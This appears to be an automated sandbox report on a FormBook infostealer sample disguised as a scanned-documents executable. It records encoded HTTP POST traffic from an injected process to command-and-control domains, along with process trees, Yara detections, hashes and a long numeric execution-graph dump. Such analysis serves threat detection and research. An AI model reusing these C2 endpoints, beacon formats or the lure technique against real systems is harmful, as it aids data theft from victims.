                                                    Data Raw: 65 66 4d 3d 36 36 45 48 54 39 37 7a 59 71 75 35 66 30 49 57 68 37 31 43 51 39 56 65 38 45 6a 61 49 62 66 72 6f 50 50 38 41 4e 58 4e 73 77 38 72 33 36 6d 38 69 41 73 6c 63 30 74 62 59 54 66 50 61 41 34 76 2f 52 2f 4a 54 56 72 46 4c 76 59 75 35 49 32 63 32 65 31 4a 63 2b 48 62 75 48 77 41 49 67 6a 2b 36 64 7a 6b 55 6f 76 70 61 48 75 4f 69 66 37 67 78 32 78 59 6e 6b 37 71 4e 45 72 39 39 46 4a 42 70 52 58 34 54 39 6a 73 55 2f 58 58 50 50 56 6b 33 76 47 50 71 73 62 50 57 4c 44 70 38 6a 63 48 59 75 51 48 4b 68 76 32 77 51 62 2b 63 67 32 63 51 66 79 46 7a 32 6b 33 66 68 5a 42 70 51 4d 39 4a 67 3d 3d
                                                    Data Ascii: efM=66EHT97zYqu5f0IWh71CQ9Ve8EjaIbfroPP8ANXNsw8r36m8iAslc0tbYTfPaA4v/R/JTVrFLvYu5I2c2e1Jc+HbuHwAIgj+6dzkUovpaHuOif7gx2xYnk7qNEr99FJBpRX4T9jsU/XXPPVk3vGPqsbPWLDp8jcHYuQHKhv2wQb+cg2cQfyFz2k3fhZBpQM9Jg==


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    42 | 192.168.2.4 | 55440 | 116.213.43.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:34:02.711033106 CEST | 720 | OUT | POST /jda9/ HTTP/1.1
                                                    Host: www.mqmsqkw.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.mqmsqkw.lol
                                                    Referer: http://www.mqmsqkw.lol/jda9/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 36 36 45 48 54 39 37 7a 59 71 75 35 65 56 34 57 6a 63 4a 43 56 64 56 64 7a 6b 6a 61 47 4c 66 56 6f 4f 7a 38 41 4a 48 64 74 43 6f 72 33 59 2b 38 6a 43 55 6c 52 55 74 62 66 6a 66 4b 55 67 34 61 2f 52 37 76 54 51 44 46 4c 76 4d 75 35 4a 47 63 32 74 64 47 64 75 48 56 31 33 77 65 47 41 6a 2b 36 64 7a 6b 55 6f 71 2b 61 48 32 4f 69 76 72 67 79 58 78 62 75 45 36 59 45 6b 72 39 35 46 4a 46 70 52 57 76 54 38 2b 35 55 39 66 58 50 4f 46 6b 33 2b 47 49 67 73 62 42 59 72 43 6a 37 51 39 43 42 37 31 39 56 43 2f 49 75 68 66 42 55 47 6e 47 42 75 54 53 68 32 41 45 43 6d 51 31 6b 54 78 30 53 6e 51 4a 6a 43 45 45 6b 4b 59 54 72 45 76 6b 4f 4f 41 58 58 6b 59 3d
                                                    Data Ascii: efM=66EHT97zYqu5eV4WjcJCVdVdzkjaGLfVoOz8AJHdtCor3Y+8jCUlRUtbfjfKUg4a/R7vTQDFLvMu5JGc2tdGduHV13weGAj+6dzkUoq+aH2OivrgyXxbuE6YEkr95FJFpRWvT8+5U9fXPOFk3+GIgsbBYrCj7Q9CB719VC/IuhfBUGnGBuTSh2AECmQ1kTx0SnQJjCEEkKYTrEvkOOAXXkY=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    43 | 192.168.2.4 | 55441 | 116.213.43.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:34:05.237059116 CEST | 10802 | OUT | POST /jda9/ HTTP/1.1
                                                    Host: www.mqmsqkw.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.mqmsqkw.lol
                                                    Referer: http://www.mqmsqkw.lol/jda9/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 36 36 45 48 54 39 37 7a 59 71 75 35 65 56 34 57 6a 63 4a 43 56 64 56 64 7a 6b 6a 61 47 4c 66 56 6f 4f 7a 38 41 4a 48 64 74 43 77 72 33 4c 32 38 68 6c 34 6c 51 55 74 62 63 6a 66 4c 55 67 34 48 2f 52 44 6a 54 51 47 77 4c 74 30 75 37 76 79 63 2f 38 64 47 54 75 48 56 71 48 77 66 49 67 6a 52 36 64 6a 67 55 6f 36 2b 61 48 32 4f 69 74 6a 67 6b 32 78 62 69 6b 37 71 4e 45 72 68 39 46 4a 39 70 56 43 2f 54 38 36 70 56 4e 2f 58 42 50 31 6b 37 73 2b 49 6f 73 61 6e 62 72 44 32 37 51 78 4a 42 2f 56 41 56 42 6a 69 75 68 72 42 58 67 57 6c 57 4e 62 77 6a 56 56 61 51 55 6b 75 6e 51 42 70 52 30 46 77 75 7a 55 62 38 62 6c 35 76 54 48 74 57 39 49 44 55 52 64 36 76 73 55 33 6f 6e 61 54 38 76 47 71 36 73 45 41 66 4e 6d 59 62 4f 75 2b 4c 59 52 6d 4b 65 6a 57 53 32 38 4f 79 7a 73 51 72 4a 4e 4b 68 46 37 54 57 39 46 42 6c 38 57 6e 2b 74 72 2f 69 36 54 70 78 64 41 5a 6c 4b 2b 53 79 37 65 5a 77 45 64 42 77 34 61 41 56 6e 78 67 63 49 62 71 55 77 68 35 45 62 69 31 7a 37 50 79 77 35 54 73 55 39 74 44 52 30 46 79 62 4c [TRUNCATED]
                                                    Data Ascii: efM=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 [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    44 | 192.168.2.4 | 55442 | 116.213.43.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:34:07.770054102 CEST | 436 | OUT | GET /jda9/?GTP=uhqpjxIPh&efM=34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230= HTTP/1.1
                                                    Host: www.mqmsqkw.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    45 | 192.168.2.4 | 55443 | 116.213.43.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:34:34.662576914 CEST | 700 | OUT | POST /yxos/ HTTP/1.1
                                                    Host: www.lfghtko.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lfghtko.lol
                                                    Referer: http://www.lfghtko.lol/yxos/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 69 63 61 45 74 47 79 59 6d 31 6d 61 35 73 79 53 53 33 41 73 55 7a 38 36 36 6b 4b 64 64 4e 65 45 77 5a 58 70 57 58 43 49 50 48 50 31 6e 58 51 35 63 49 38 38 79 76 65 56 77 47 44 49 78 70 65 6c 68 65 76 35 75 69 35 55 34 62 6c 51 75 42 45 70 6e 59 58 53 66 47 72 53 43 6a 6f 2b 37 37 4f 72 46 6e 59 31 49 55 75 46 5a 58 78 44 71 79 6b 6b 50 35 62 49 67 49 6a 4e 58 4b 7a 6d 43 36 4e 56 35 6e 63 4a 4d 73 57 68 4d 6d 56 6d 79 6e 72 69 37 58 64 4c 43 6c 62 6f 5a 64 38 56 67 63 6d 63 58 67 45 45 4a 73 34 56 58 34 33 4b 58 72 57 6c 53 6e 63 6a 43 51 3d 3d
                                                    Data Ascii: efM=LugYlboQcaRDicaEtGyYm1ma5sySS3AsUz866kKddNeEwZXpWXCIPHP1nXQ5cI88yveVwGDIxpelhev5ui5U4blQuBEpnYXSfGrSCjo+77OrFnY1IUuFZXxDqykkP5bIgIjNXKzmC6NV5ncJMsWhMmVmynri7XdLClboZd8VgcmcXgEEJs4VX43KXrWlSncjCQ==


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    46 | 192.168.2.4 | 55444 | 116.213.43.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:34:37.207216024 CEST | 720 | OUT | POST /yxos/ HTTP/1.1
                                                    Host: www.lfghtko.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lfghtko.lol
                                                    Referer: http://www.lfghtko.lol/yxos/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 6a 39 4b 45 69 48 79 59 75 31 6d 64 38 73 79 53 62 58 41 53 55 7a 67 36 36 6b 69 7a 64 2f 36 45 77 35 6e 70 58 57 43 49 49 48 50 31 76 33 51 34 44 34 38 6e 79 76 53 73 77 48 2f 49 78 6f 36 6c 68 63 6e 35 74 52 52 54 36 4c 6c 4f 37 52 45 72 34 49 58 53 66 47 72 53 43 6e 4a 6a 37 34 2b 72 46 57 6f 31 4f 31 75 45 48 48 78 45 74 79 6b 6b 4c 35 62 54 67 49 6a 76 58 49 58 4d 43 34 31 56 35 6d 73 4a 4c 2b 2b 75 47 6d 56 73 39 48 71 4f 37 32 4d 73 45 33 71 63 59 37 52 77 6c 74 2b 6f 66 47 56 65 59 64 5a 43 46 34 54 35 4b 73 66 52 66 6b 68 71 5a 58 35 42 57 64 6e 50 6c 62 62 53 39 34 75 6c 73 70 39 55 53 70 73 3d
                                                    Data Ascii: efM=LugYlboQcaRDj9KEiHyYu1md8sySbXASUzg66kizd/6Ew5npXWCIIHP1v3Q4D48nyvSswH/Ixo6lhcn5tRRT6LlO7REr4IXSfGrSCnJj74+rFWo1O1uEHHxEtykkL5bTgIjvXIXMC41V5msJL++uGmVs9HqO72MsE3qcY7Rwlt+ofGVeYdZCF4T5KsfRfkhqZX5BWdnPlbbS94ulsp9USps=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    47 | 192.168.2.4 | 55445 | 116.213.43.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:34:39.739084959 CEST | 10802 | OUT | POST /yxos/ HTTP/1.1
                                                    Host: www.lfghtko.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lfghtko.lol
                                                    Referer: http://www.lfghtko.lol/yxos/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 6a 39 4b 45 69 48 79 59 75 31 6d 64 38 73 79 53 62 58 41 53 55 7a 67 36 36 6b 69 7a 64 2f 79 45 77 4b 76 70 58 31 71 49 4a 48 50 31 6c 58 51 44 44 34 38 6d 79 73 69 6f 77 48 7a 32 78 71 79 6c 67 2f 2f 35 6f 67 52 54 67 62 6c 4f 6b 68 45 6f 6e 59 58 48 66 43 50 57 43 6a 74 6a 37 34 2b 72 46 56 77 31 4e 6b 75 45 46 48 78 44 71 79 6b 34 50 35 61 64 67 49 36 53 58 49 43 37 43 4d 4a 56 35 46 55 4a 4e 4c 4b 75 4b 6d 56 69 38 48 71 57 37 32 41 7a 45 33 6d 6d 59 2f 51 62 6c 74 61 6f 62 6e 74 64 4c 2f 78 56 66 4a 48 30 56 4d 50 51 64 31 51 6d 58 6e 70 47 51 74 6d 57 32 6f 7a 52 36 34 66 7a 35 70 64 79 54 73 2f 4e 72 47 50 67 6e 34 31 34 78 75 52 65 5a 67 4e 42 6a 6a 51 46 56 62 7a 6d 6f 78 30 4f 33 34 68 6e 4d 58 49 56 31 36 73 50 6d 7a 7a 68 67 74 45 36 6e 72 5a 75 47 4a 48 30 50 36 38 4b 47 6b 53 4f 54 34 78 56 4d 49 42 52 57 4b 4b 54 41 68 62 47 77 36 4f 33 47 4f 4c 47 72 62 65 4c 4d 50 4e 49 56 2b 6c 42 56 68 33 33 2f 38 30 45 38 53 69 7a 77 55 61 68 59 67 [TRUNCATED]
                                                    Data Ascii: efM=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 [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    48 | 192.168.2.4 | 55446 | 116.213.43.190 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:34:42.658773899 CEST | 436 | OUT | GET /yxos/?efM=GsI4mtIQVr1bqd+V/1qEiGWG2JWSdng8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR32o8KijRXgfnfSTbVFHsQqIz2A3ZpJ0HUFH4=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.lfghtko.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31



                                                    Target ID:0
                                                    Start time:09:30:32
                                                    Start date:05/08/2024
                                                    Path:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
                                                    Imagebase:0x280000
                                                    File size:1'261'056 bytes
                                                    MD5 hash:75D0BFD0499F3BB0C94A45A80E92476B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:09:30:33
                                                    Start date:05/08/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
                                                    Imagebase:0xc90000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:09:30:54
                                                    Start date:05/08/2024
                                                    Path:C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe"
                                                    Imagebase:0x210000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:4
                                                    Start time:09:30:56
                                                    Start date:05/08/2024
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                    Imagebase:0x7b0000
                                                    File size:187'904 bytes
                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:7
                                                    Start time:09:31:09
                                                    Start date:05/08/2024
                                                    Path:C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe"
                                                    Imagebase:0x210000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:09:31:21
                                                    Start date:05/08/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6bf500000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:3.3%
                                                      Dynamic/Decrypted Code Coverage:0.9%
                                                      Signature Coverage:4.6%
                                                      Total number of Nodes:1995
                                                      Total number of Limit Nodes:50
                                                      execution_graph 94913 281cad SystemParametersInfoW 94914 2b8402 94919 2b81be 94914->94919 94917 2b842a 94922 2b81ef try_get_first_available_module 94919->94922 94921 2b83ee 94938 2b27ec 26 API calls __fread_nolock 94921->94938 94930 2b8338 94922->94930 94934 2a8e0b 40 API calls 2 library calls 94922->94934 94924 2b8343 94924->94917 94931 2c0984 94924->94931 94926 2b838c 94926->94930 94935 2a8e0b 40 API calls 2 library calls 94926->94935 94928 2b83ab 94928->94930 94936 2a8e0b 40 API calls 2 library calls 94928->94936 94930->94924 94937 2af2d9 20 API calls __dosmaperr 94930->94937 94939 2c0081 94931->94939 94933 2c099f 94933->94917 94934->94926 94935->94928 94936->94930 94937->94921 94938->94924 94942 2c008d BuildCatchObjectHelperInternal 94939->94942 94940 2c009b 94996 2af2d9 20 API calls __dosmaperr 94940->94996 94942->94940 94944 2c00d4 94942->94944 94943 2c00a0 94997 2b27ec 26 API calls __fread_nolock 94943->94997 94950 2c065b 94944->94950 94949 2c00aa __fread_nolock 94949->94933 94951 2c0678 94950->94951 94952 2c068d 94951->94952 94953 2c06a6 94951->94953 95013 2af2c6 20 API calls __dosmaperr 94952->95013 94999 2b5221 94953->94999 94956 2c06ab 94958 2c06cb 94956->94958 94959 2c06b4 94956->94959 94957 2c0692 95014 2af2d9 20 API calls __dosmaperr 94957->95014 95012 2c039a CreateFileW 94958->95012 95015 2af2c6 20 API calls __dosmaperr 94959->95015 94963 2c06b9 95016 2af2d9 20 API calls __dosmaperr 94963->95016 94965 2c0781 GetFileType 94966 2c078c GetLastError 94965->94966 94967 2c07d3 94965->94967 95019 2af2a3 20 API calls __dosmaperr 94966->95019 95021 2b516a 21 API calls 2 library calls 94967->95021 94968 2c0756 GetLastError 95018 2af2a3 20 API calls __dosmaperr 94968->95018 94969 2c0704 94969->94965 94969->94968 95017 2c039a CreateFileW 94969->95017 94973 2c079a CloseHandle 94973->94957 94976 2c07c3 94973->94976 94975 2c0749 94975->94965 94975->94968 95020 2af2d9 20 API calls __dosmaperr 94976->95020 94978 
2d63d1 96263->96266 96268 291940 9 API calls 96265->96268 96504 305745 54 API calls _wcslen 96266->96504 96269 291549 96268->96269 96273 2d64fa 96269->96273 96275 291940 9 API calls 96269->96275 96270 29fddb 22 API calls 96270->96278 96271 291872 96499 29faeb 23 API calls 96271->96499 96272 29fe0b 22 API calls 96272->96278 96282 2d6369 96273->96282 96505 2f359c 82 API calls __wsopen_s 96273->96505 96280 291563 96275->96280 96277 28ec40 235 API calls 96277->96278 96278->96259 96278->96262 96278->96263 96278->96270 96278->96272 96278->96277 96279 2d63b2 96278->96279 96278->96282 96503 2f359c 82 API calls __wsopen_s 96279->96503 96280->96273 96283 28a8c7 22 API calls 96280->96283 96285 2915c7 messages 96280->96285 96282->96191 96283->96285 96284 291940 9 API calls 96284->96285 96285->96271 96285->96273 96285->96282 96285->96284 96287 29167b messages 96285->96287 96290 284f39 68 API calls 96285->96290 96396 2ed4ce 96285->96396 96399 30959f 96285->96399 96402 2ff0ec 96285->96402 96411 2f6ef1 96285->96411 96491 30958b 96285->96491 96286 29171d 96286->96191 96287->96286 96494 29ce17 22 API calls messages 96287->96494 96290->96285 96846 28adf0 96295->96846 96297 28bf9d 96298 28bfa9 96297->96298 96299 2d04b6 96297->96299 96301 2d04c6 96298->96301 96302 28c01e 96298->96302 96865 2f359c 82 API calls __wsopen_s 96299->96865 96866 2f359c 82 API calls __wsopen_s 96301->96866 96851 28ac91 96302->96851 96306 2e7120 22 API calls 96350 28c039 __fread_nolock messages 96306->96350 96307 28c7da 96310 29fe0b 22 API calls 96307->96310 96316 28c808 __fread_nolock 96310->96316 96312 2d04f5 96317 2d055a 96312->96317 96867 29d217 235 API calls 96312->96867 96315 29fddb 22 API calls 96315->96350 96319 29fe0b 22 API calls 96316->96319 96339 28c603 96317->96339 96868 2f359c 82 API calls __wsopen_s 96317->96868 96318 28ec40 235 API calls 96318->96350 96349 28c350 __fread_nolock messages 96319->96349 96320 28af8a 22 API calls 96320->96350 96321 2d091a 96878 2f3209 23 API calls 96321->96878 96324 
2d08a5 96325 28ec40 235 API calls 96324->96325 96326 2d08cf 96325->96326 96326->96339 96876 28a81b 41 API calls 96326->96876 96328 2d0591 96869 2f359c 82 API calls __wsopen_s 96328->96869 96332 2d08f6 96877 2f359c 82 API calls __wsopen_s 96332->96877 96334 28bbe0 40 API calls 96334->96350 96336 28c237 96337 28c253 96336->96337 96338 28a8c7 22 API calls 96336->96338 96340 2d0976 96337->96340 96344 28c297 messages 96337->96344 96338->96337 96339->96191 96879 28aceb 23 API calls messages 96340->96879 96343 2d09bf 96343->96339 96880 2f359c 82 API calls __wsopen_s 96343->96880 96344->96343 96862 28aceb 23 API calls messages 96344->96862 96346 28c335 96346->96343 96347 28c342 96346->96347 96863 28a704 22 API calls messages 96347->96863 96352 28c3ac 96349->96352 96864 29ce17 22 API calls messages 96349->96864 96350->96306 96350->96307 96350->96312 96350->96315 96350->96316 96350->96317 96350->96318 96350->96320 96350->96321 96350->96324 96350->96328 96350->96332 96350->96334 96350->96336 96350->96339 96350->96343 96351 29fe0b 22 API calls 96350->96351 96855 28ad81 96350->96855 96870 2e7099 22 API calls __fread_nolock 96350->96870 96871 305745 54 API calls _wcslen 96350->96871 96872 29aa42 22 API calls messages 96350->96872 96873 2ef05c 40 API calls 96350->96873 96874 28a993 41 API calls 96350->96874 96875 28aceb 23 API calls messages 96350->96875 96351->96350 96352->96191 96353->96191 96354->96191 96355->96191 96378 28ec76 messages 96356->96378 96357 29fddb 22 API calls 96357->96378 96359 28fef7 96365 28a8c7 22 API calls 96359->96365 96373 28ed9d messages 96359->96373 96361 28f3ae messages 96361->96373 96891 2f359c 82 API calls __wsopen_s 96361->96891 96362 2d4600 96368 28a8c7 22 API calls 96362->96368 96362->96373 96363 2d4b0b 96892 2f359c 82 API calls __wsopen_s 96363->96892 96364 28a8c7 22 API calls 96364->96378 96365->96373 96368->96373 96370 2a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96370->96378 
96371 28fbe3 96371->96361 96371->96373 96374 2d4bdc 96371->96374 96372 28a961 22 API calls 96372->96378 96373->96191 96893 2f359c 82 API calls __wsopen_s 96374->96893 96375 2a00a3 29 API calls pre_c_initialization 96375->96378 96377 2d4beb 96894 2f359c 82 API calls __wsopen_s 96377->96894 96378->96357 96378->96359 96378->96361 96378->96362 96378->96363 96378->96364 96378->96370 96378->96371 96378->96372 96378->96373 96378->96375 96378->96377 96379 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96378->96379 96889 2901e0 235 API calls 2 library calls 96378->96889 96890 2906a0 41 API calls messages 96378->96890 96379->96378 96380->96191 96381->96202 96382->96202 96383->96202 96384->96212 96385->96214 96386->96234 96387->96234 96388->96219 96389->96227 96390->96234 96391->96234 96392->96234 96393->96234 96394->96234 96395->96234 96506 2edbbe lstrlenW 96396->96506 96511 307f59 96399->96511 96401 3095af 96401->96285 96403 287510 53 API calls 96402->96403 96404 2ff126 96403->96404 96644 289e90 96404->96644 96406 2ff136 96407 2ff15b 96406->96407 96408 28ec40 235 API calls 96406->96408 96410 2ff15f 96407->96410 96672 289c6e 22 API 